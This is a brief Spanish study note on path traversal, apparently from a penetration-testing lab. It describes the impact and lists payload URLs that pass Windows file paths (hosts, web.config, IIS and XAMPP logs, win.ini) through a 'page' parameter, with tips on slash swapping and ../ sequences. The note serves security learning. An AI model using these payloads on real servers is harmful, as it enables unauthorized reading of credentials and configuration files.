Directory traversal / Path Traversal: Podemos LEER archivos recorriendo diferentes rutas del servidor.
Impacto
Acceso no autorizado a archivos del sistema: Permite al atacante acceder a archivos fuera del directorio de la aplicación, como configuraciones, contraseñas, claves o archivos sensibles.
Divulgación de información confidencial: Exposición de datos sensibles almacenados en el servidor.
Ejemplo de acceso a archivos críticos: Archivos del sistema operativo, bases de datos o registros de usuarios.
Ejecución de código malicioso: En algunos casos, el atacante puede usar esta vulnerabilidad (con un LFI por ejemplo) para ejecutar comandos o inyectar scripts dañinos.
http://mountaindesserts.com/meteor/index.php?page=C:\Windows\System32\drivers\etc\hosts
http://mountaindesserts.com/meteor/index.php?page=C:\inetpub\logs\LogFiles\W3SVC1\
http://mountaindesserts.com/meteor/index.php?page=C:\inetpub\wwwroot\web.config
http://mountaindesserts.com/meteor/index.php?page=C:\Users\install.txt
http://mountaindesserts.com/meteor/index.php?page=C:/xampp/apache/logs/access.log
Windows/win.ini
Try also to change / for \
Try also to remove C:/ and add ../../../../../